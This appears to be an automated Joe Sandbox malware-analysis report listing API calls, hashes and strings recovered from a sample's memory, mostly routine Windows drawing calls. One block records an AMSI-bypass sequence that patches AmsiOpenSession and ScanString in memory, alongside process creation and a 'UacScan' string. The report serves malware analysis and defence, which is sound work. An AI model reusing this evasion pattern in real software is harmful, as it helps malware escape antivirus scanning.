• DeleteObject.GDI32 ref: 032D57F3
• DeleteDC.GDI32(?), ref: 032D5809
• SelectObject.GDI32(?,00000000), ref: 032D5824
• DeleteDC.GDI32(00000000), ref: 032D5840
• ReleaseDC.USER32(00000000,00000000), ref: 032D5851
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
• String ID:
• API String ID: 332224125-0
• Opcode ID: 4bb57c12748358043eb635178d7b3209a00d9c4a145b8ef2cbacd87478f3fe21
• Instruction ID: 6fba00b147f9a424f185333acfc1f62bfb1b4fa89b6d175ee62bb564b8286731
• Opcode Fuzzy Hash: 4bb57c12748358043eb635178d7b3209a00d9c4a145b8ef2cbacd87478f3fe21
• Instruction Fuzzy Hash: BC51EC76E20309AFDB11EBE8DC45FEEB7FCAB09740F144465B614EB280D6B59984CB60
Uniqueness

Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 032D665A
                                                                                                    • CreateCompatibleDC.GDI32(00000001), ref: 032D66BF
                                                                                                    • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 032D66D4
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 032D66DE
                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 032D670E
                                                                                                    • RealizePalette.GDI32(?), ref: 032D671A
                                                                                                    • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 032D673E
                                                                                                    • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,032D6797,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 032D674C
                                                                                                    • SelectPalette.GDI32(?,00000000,000000FF), ref: 032D677E
                                                                                                    • SelectObject.GDI32(?,?), ref: 032D678B
                                                                                                    • DeleteObject.GDI32(00000000), ref: 032D6791
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                                                                                                    • String ID: ($BM
                                                                                                    • API String ID: 2831685396-2980357723
                                                                                                    • Opcode ID: 026dc785bb87bbaf5c46de79291b3c120a7324db834831c0bc0d90ce50d50bcb
                                                                                                    • Instruction ID: 1e05a38666f61880c21a01831b64297fbb88f965eaf903f03c05511c10577e43
                                                                                                    • Opcode Fuzzy Hash: 026dc785bb87bbaf5c46de79291b3c120a7324db834831c0bc0d90ce50d50bcb
                                                                                                    • Instruction Fuzzy Hash: 07D15A74A20219AFDF14DFA8C884BAEBBF5FF48300F548469E914EB395D7749884CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetWindowDC.USER32(00000000), ref: 032F2DD4
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 032F2DF7
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 032F2E09
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 032F2E1F
                                                                                                    • OffsetRect.USER32(?,?,?), ref: 032F2E34
                                                                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,032F3053), ref: 032F2E4D
                                                                                                    • InflateRect.USER32(?,00000000,00000000), ref: 032F2E6B
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 032F2E85
                                                                                                    • DrawEdge.USER32(?,?,?,00000008), ref: 032F2F84
                                                                                                    • IntersectClipRect.GDI32(?,?,?,?,?), ref: 032F2F9D
                                                                                                    • OffsetRect.USER32(?,?,?), ref: 032F2FC7
                                                                                                    • GetRgnBox.GDI32(?,?), ref: 032F2FD6
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 032F2FEC
                                                                                                    • IntersectRect.USER32(?,?,?), ref: 032F2FFD
                                                                                                    • OffsetRect.USER32(?,?,?), ref: 032F3012
                                                                                                    • FillRect.USER32(?,?,00000000), ref: 032F302E
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 032F304D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$Window$Offset$ClipIntersectPoints$ClientDrawEdgeExcludeFillInflateLongRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 2490777911-0
                                                                                                    • Opcode ID: 1c39feaea855196041dffaa59265d086b6ab5f4af5da568e90cea62233a1d806
                                                                                                    • Instruction ID: 473e3b782686f18dab91bb7b3b2181095fda1675d6f8c5fdb69f2f646c9a96cb
                                                                                                    • Opcode Fuzzy Hash: 1c39feaea855196041dffaa59265d086b6ab5f4af5da568e90cea62233a1d806
                                                                                                    • Instruction Fuzzy Hash: 2CA10975E10209AFCB01DBA8C895EEEB7FDAF49300F1480A5EA15FB251C775AA45CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 032D6164: GetDC.USER32(00000000), ref: 032D61BA
                                                                                                      • Part of subcall function 032D6164: GetDeviceCaps.GDI32(00000000,0000000C), ref: 032D61CF
                                                                                                      • Part of subcall function 032D6164: GetDeviceCaps.GDI32(00000000,0000000E), ref: 032D61D9
                                                                                                      • Part of subcall function 032D6164: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,032D4D27,00000000,032D4DB3), ref: 032D61FD
                                                                                                      • Part of subcall function 032D6164: ReleaseDC.USER32(00000000,00000000), ref: 032D6208
                                                                                                    • SelectPalette.GDI32(?,?,000000FF), ref: 032D5BAF
                                                                                                    • RealizePalette.GDI32(?), ref: 032D5BBE
                                                                                                    • GetDeviceCaps.GDI32(?,0000000C), ref: 032D5BD0
                                                                                                    • GetDeviceCaps.GDI32(?,0000000E), ref: 032D5BDF
                                                                                                    • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 032D5C12
                                                                                                    • SetStretchBltMode.GDI32(?,00000004), ref: 032D5C20
                                                                                                    • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 032D5C38
                                                                                                    • SetStretchBltMode.GDI32(00000000,00000003), ref: 032D5C55
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 032D5CB6
                                                                                                    • SelectObject.GDI32(?,?), ref: 032D5CCB
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 032D5D2A
                                                                                                    • DeleteDC.GDI32(00000000), ref: 032D5D39
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 2414602066-0
                                                                                                    • Opcode ID: 9ad9e042876c54314f6923c9df0b8b6c7418111700c64dbf03ebf51459a63ef3
                                                                                                    • Instruction ID: 1ca410d2b4318462d7bb38205bf246fef33ce7b39ab58d824c6821d082fa63df
                                                                                                    • Opcode Fuzzy Hash: 9ad9e042876c54314f6923c9df0b8b6c7418111700c64dbf03ebf51459a63ef3
                                                                                                    • Instruction Fuzzy Hash: 14711A79A14205AFDB50DFACC985F9EBBF8AF09300F248554B518EB691D7B4ED80CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 032D353F
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 032D3549
                                                                                                    • GetObjectA.GDI32(?,00000018,?), ref: 032D3569
                                                                                                    • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 032D3580
                                                                                                    • GetDC.USER32(00000000), ref: 032D358C
                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 032D35B9
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 032D35DF
                                                                                                    • SelectObject.GDI32(?,?), ref: 032D35FA
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 032D3609
                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 032D3635
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 032D3643
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 032D3651
                                                                                                    • DeleteDC.GDI32(?), ref: 032D3667
                                                                                                    • DeleteDC.GDI32(?), ref: 032D3670
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                                    • String ID:
                                                                                                    • API String ID: 644427674-0
                                                                                                    • Opcode ID: 3ad03305532846b54da3b7dd09bc2bae35ad6742b1aaf3d917ad5c698de839f9
                                                                                                    • Instruction ID: 263418ae1f8d8cd0cb4874fcdd5144a9784b98f0018a7a683bfa6c17678ff3e7
                                                                                                    • Opcode Fuzzy Hash: 3ad03305532846b54da3b7dd09bc2bae35ad6742b1aaf3d917ad5c698de839f9
                                                                                                    • Instruction Fuzzy Hash: 0E410D7AE14309AFDB51EBE8CC45FAEB7BCEB08740F004451F614EB240D6B599808BA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 032B7454
                                                                                                    • RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 032B7460
                                                                                                    • RegisterWindowMessageA.USER32(MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 032B746F
                                                                                                    • RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG,MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 032B747B
                                                                                                    • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 032B7493
                                                                                                    • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 032B74B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Window$Register$Send$Find
                                                                                                    • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                                    • API String ID: 3569030445-3736581797
                                                                                                    • Opcode ID: 1d9a84d294e61febc53d96c158aa70136870293b5b0d6fd02ab35d1b4f6c23ac
                                                                                                    • Instruction ID: dcaaf4b9099902c4fb1d3637886c510d4072197c8b98e52e0621608c4525b05e
                                                                                                    • Opcode Fuzzy Hash: 1d9a84d294e61febc53d96c158aa70136870293b5b0d6fd02ab35d1b4f6c23ac
                                                                                                    • Instruction Fuzzy Hash: B6111F75264302AFE710DFADDC41BAABBB8EF94791F148465B9C48F281D6B099C0CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 032DDDC7
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 032DDDE2
                                                                                                    • OffsetRect.USER32(?,?,?), ref: 032DDDF7
                                                                                                    • GetWindowDC.USER32(00000000,?,?,?,00000000,?), ref: 032DDE05
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 032DDE36
                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 032DDE4B
                                                                                                    • GetSystemMetrics.USER32(00000003), ref: 032DDE54
                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 032DDE63
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 032DDE90
                                                                                                    • FillRect.USER32(?,?,00000000), ref: 032DDE9E
                                                                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,032DDF07,?,00000000,?,?,?,00000000,?), ref: 032DDEC3
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 032DDF01
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 19621357-0
                                                                                                    • Opcode ID: 9ccd5eba085b926876b7a10f04099d356a2d657ebb604638e3a7227a5c7db05a
                                                                                                    • Instruction ID: 039181272a95addfc419dacdc9a77261a63f9c3bc58ec5effcb294d36e91cddd
                                                                                                    • Opcode Fuzzy Hash: 9ccd5eba085b926876b7a10f04099d356a2d657ebb604638e3a7227a5c7db05a
                                                                                                    • Instruction Fuzzy Hash: A2414C76A14209AECB10EAECCC41EEFB7BDAF49350F140551FA04FB281C671AA858760
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 032CFD40: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD78
                                                                                                      • Part of subcall function 032CFD40: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD86
                                                                                                      • Part of subcall function 032CFD40: GetProcAddress.KERNEL32(74F60000,00000000), ref: 032CFD9F
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDBB
                                                                                                      • Part of subcall function 032CFD40: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDC1
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDEB
                                                                                                      • Part of subcall function 032CFD40: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDF1
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000), ref: 032CFDFA
                                                                                                      • Part of subcall function 032CFD40: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000), ref: 032CFE00
                                                                                                      • Part of subcall function 032CFD40: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000), ref: 032CFE0B
                                                                                                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?,ScanString,03330350,0330C3F8,OpenSession,03330350), ref: 0330C128
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,ScanString,03330350,0330C3F8,OpenSession,03330350,0330C3F8,ScanString,03330350,0330C3F8,OpenSession,03330350,0330C3F8,UacScan,03330350), ref: 0330C372
                                                                                                    • CloseHandle.KERNEL32(?,?,000000FF,ScanString,03330350,0330C3F8,OpenSession,03330350,0330C3F8,ScanString,03330350,0330C3F8,OpenSession,03330350,0330C3F8,UacScan), ref: 0330C37B
                                                                                                    • CloseHandle.KERNEL32(?,?,?,000000FF,ScanString,03330350,0330C3F8,OpenSession,03330350,0330C3F8,ScanString,03330350,0330C3F8,OpenSession,03330350,0330C3F8), ref: 0330C384
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentHandle$CloseLibraryMemoryVirtual$AddressCacheCreateFlushFreeInstructionLoadModuleObjectProcProtectSingleUserWaitWrite
                                                                                                    • String ID: Amsi$AmsiOpenSession$D$OpenSession$ScanString$UacScan
                                                                                                    • API String ID: 1580047464-2048511366
                                                                                                    • Opcode ID: d1e7d52665e4c945686b9d91c73d2434b861537b1825d098e365b67d3fbf9ece
                                                                                                    • Instruction ID: c4aa54e11a1ffd4b8b6288e24be51c0d619e54b958bfdfdb81d801005703a9a2
                                                                                                    • Opcode Fuzzy Hash: d1e7d52665e4c945686b9d91c73d2434b861537b1825d098e365b67d3fbf9ece
                                                                                                    • Instruction Fuzzy Hash: 3DF13B38A203299BDB15FB65CCD0BDEB3B9AF45340F5041E2D018AF256DAB4AEC58F51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 032B296A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                    • API String ID: 2030045667-32948583
                                                                                                    • Opcode ID: eb318e441d262f3940374c01d5d5ce26b6e8b877f6551b66669ba3bedb16ff5a
                                                                                                    • Instruction ID: e90ac949454aa7b5e5d46f839b3b82a5e8906b88fd8dc25e16f32c582769613b
                                                                                                    • Opcode Fuzzy Hash: eb318e441d262f3940374c01d5d5ce26b6e8b877f6551b66669ba3bedb16ff5a
                                                                                                    • Instruction Fuzzy Hash: 3BA1F934A24368CBDF21EA2CC884BD8B6F9EB0D790F1449E5E589DB345CBB489C5CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • EnumDisplayMonitors.USER32(?,?,?,?), ref: 032DB29D
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 032DB2C2
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 032DB2CD
                                                                                                    • GetClipBox.GDI32(?,?), ref: 032DB2DF
                                                                                                    • GetDCOrgEx.GDI32(?,?), ref: 032DB2EC
                                                                                                    • OffsetRect.USER32(?,?,?), ref: 032DB305
                                                                                                    • IntersectRect.USER32(?,?,?), ref: 032DB316
                                                                                                    • IntersectRect.USER32(?,?,?), ref: 032DB32C
                                                                                                      • Part of subcall function 032DACBC: GetProcAddress.KERNEL32(76910000,00000000), ref: 032DAD3B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                                                                    • String ID: EnumDisplayMonitors
                                                                                                    • API String ID: 362875416-2491903729
                                                                                                    • Opcode ID: 5462091944a1370c9f1fc21b4961d184b998dda7e230d5a741b04fdf8c8074ae
                                                                                                    • Instruction ID: 32a885a6b55f533d97a078cd30c204ab462e4034d578e711984f969d1a9d1ce2
                                                                                                    • Opcode Fuzzy Hash: 5462091944a1370c9f1fc21b4961d184b998dda7e230d5a741b04fdf8c8074ae
                                                                                                    • Instruction Fuzzy Hash: 63315076E1420EAFDB50DEA8C844AEFB7FCAF45600F058126E915E6200E7B4D5818BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 032EFF4F
                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?), ref: 032EFF73
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 032EFF7E
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 032EFF85
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 032EFF95
                                                                                                    • BeginPaint.USER32(00000000,?,00000000,032F0056,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 032EFFB7
                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 032F0013
                                                                                                    • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 032F0024
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 032F003E
                                                                                                    • DeleteDC.GDI32(00000000), ref: 032F0047
                                                                                                    • DeleteObject.GDI32(?), ref: 032F0050
                                                                                                      • Part of subcall function 032EF90C: BeginPaint.USER32(00000000,?), ref: 032EF937
                                                                                                      • Part of subcall function 032EF90C: EndPaint.USER32(00000000,?,032EFA72), ref: 032EFA65
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 3867285559-0
                                                                                                    • Opcode ID: 7390f1488fa7812d2ebcc6d3711e91d623385861eb27663dce70a26fc9285a85
                                                                                                    • Instruction ID: 07cad15e384894a1064139984933b45b330c02f5c8d7e1f5dc406ca540f4f8d8
                                                                                                    • Opcode Fuzzy Hash: 7390f1488fa7812d2ebcc6d3711e91d623385861eb27663dce70a26fc9285a85
                                                                                                    • Instruction Fuzzy Hash: 24415B39B10304AFDB10EBA8CD84BAEB7F8EF49740F5044A9F609DB381DAB59D458B50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsWindowUnicode.USER32(?), ref: 032E6EB6
                                                                                                    • SetWindowLongW.USER32(?,000000FC,?), ref: 032E6ED1
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 032E6EDC
                                                                                                    • GetWindowLongW.USER32(?,000000F4), ref: 032E6EEE
                                                                                                    • SetWindowLongW.USER32(?,000000F4,?), ref: 032E6F01
                                                                                                    • SetWindowLongA.USER32(?,000000FC,?), ref: 032E6F1A
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 032E6F25
                                                                                                    • GetWindowLongA.USER32(?,000000F4), ref: 032E6F37
                                                                                                    • SetWindowLongA.USER32(?,000000F4,?), ref: 032E6F4A
                                                                                                    • SetPropA.USER32(?,00000000,00000000), ref: 032E6F61
                                                                                                    • SetPropA.USER32(?,00000000,00000000), ref: 032E6F78
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long$Prop$Unicode
                                                                                                    • String ID:
                                                                                                    • API String ID: 1693715928-0
                                                                                                    • Opcode ID: 4c2c421cfc2bbefd1a7850dd52b57cd8b6a931f887a37ed13c2bba8b81df71d8
                                                                                                    • Instruction ID: 62b131e61cddad02fa58c878aa728fab72283fb11a7c34c001463c3e476312ae
